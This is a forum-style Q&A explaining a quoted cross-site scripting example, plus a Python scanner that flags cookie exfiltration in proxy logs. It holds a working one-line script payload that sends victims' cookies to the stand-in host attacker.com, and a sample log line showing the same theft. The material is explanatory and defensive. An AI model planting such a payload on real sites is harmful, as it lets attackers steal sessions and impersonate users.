Cited from http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt:
As many here probably know, current XSS attacks typically come in two flavors:
1 – Attacker uploads tags to a public bulletin board, blog, or other site that
has an XSS vulnerability and that lots of other users will visit. Attacker normally
harvests site cookies for later user impersonation, but form submits and other attacks
are sometimes utilized. This is what many folks I talk to think XSS is.
Here’s an example:
Someone would post the following on evilblog.com that other users would process
<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>
This would try to pull an image off the attacker’s server with the user’s evilblog
cookies in the URL.
My Question:
I don’t understand the purpose/result of image URL path being written above. Can anyone elaborate more on this?
PS: What does it mean for “This would try to pull an image off the attacker’s server with the user’s evilblog cookies in the URL”?
The document.write() simply adds an img-tag to the site and the browser will try to load the image from that URL.
Scripts and frames are sometimes blocked when they come from a different domain, so the XSS attack would fail in this case. Images are usually allowed, as many sites display images from a different host anyway, so the XSS attack will succeed.
The result is an entry in the attacker’s log which contains the cookie information, and since it usually returns nothing it’s interpreted as a broken image, so most browsers display nothing and the users don’t suspect anything.
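As an added example (not from the cited text or the original post), here is what the same request looks like from the defender's side: a scan over constructed egress proxy log lines that flags image-style GETs to untrusted hosts whose URL carries what looks like a serialised document.cookie string. The log format, the host names and the session-cookie name list are assumptions for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Cookie names commonly used for session identifiers (illustrative, assumed list).
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "sessionid", "session", "sid"}

# document.cookie serialises as "name=value; name2=value2"; once written into an
# <img src> the browser sends it URL-encoded, so "; " shows up in logs as ";%20".
COOKIE_PAIR_RE = re.compile(r"([A-Za-z0-9_.\-]+)=([^;&\s/]*)")


def cookie_pairs_in_url(url):
    """Return (name, value) pairs found in the decoded path and query of a URL."""
    parts = urlsplit(url)
    candidate = unquote(parts.path + ("?" + parts.query if parts.query else ""))
    return COOKIE_PAIR_RE.findall(candidate)


def is_cookie_exfil(url, trusted_hosts):
    """True when an untrusted host receives a URL that names a session cookie,
    or carries several cookie-style pairs separated by ';' in the path."""
    host = (urlsplit(url).hostname or "").lower()
    if host in trusted_hosts:
        return False
    pairs = cookie_pairs_in_url(url)
    names = {name.lower() for name, _ in pairs}
    decoded_path = unquote(urlsplit(url).path)
    return bool(names & SESSION_COOKIE_NAMES) or (len(pairs) >= 2 and ";" in decoded_path)


def find_cookie_exfil(log_lines, trusted_hosts):
    """Scan proxy log lines (constructed format: 'client_ip method url status')
    and return (client_ip, url) for each request that looks like cookie theft."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        client_ip, method, url, _status = fields[:4]
        # The exfil request is a plain GET for an "image"; the 404 it gets back is
        # exactly the broken-image case the answer above describes.
        if method == "GET" and is_cookie_exfil(url, trusted_hosts):
            hits.append((client_ip, url))
    return hits


# Constructed sample log; hosts use the reserved .example TLD.
TRUSTED_HOSTS = {"evilblog.example", "cdn.example"}
SAMPLE_LOG = [
    "10.0.0.5 GET http://evilblog.example/post?id=7&page=2 200",
    "10.0.0.5 GET http://cdn.example/logo.png?v=3 200",
    "10.0.0.5 GET http://attacker.example/PHPSESSID=a1b2c3;%20remember_me=1 404",
    "10.0.0.9 GET http://news.example/story?a=1&b=2 200",
]
```

Run find_cookie_exfil(SAMPLE_LOG, TRUSTED_HOSTS) to see only the attacker.example line flagged; the two-parameter news.example query is not, because its pairs are ordinary query arguments rather than a ';'-joined cookie string.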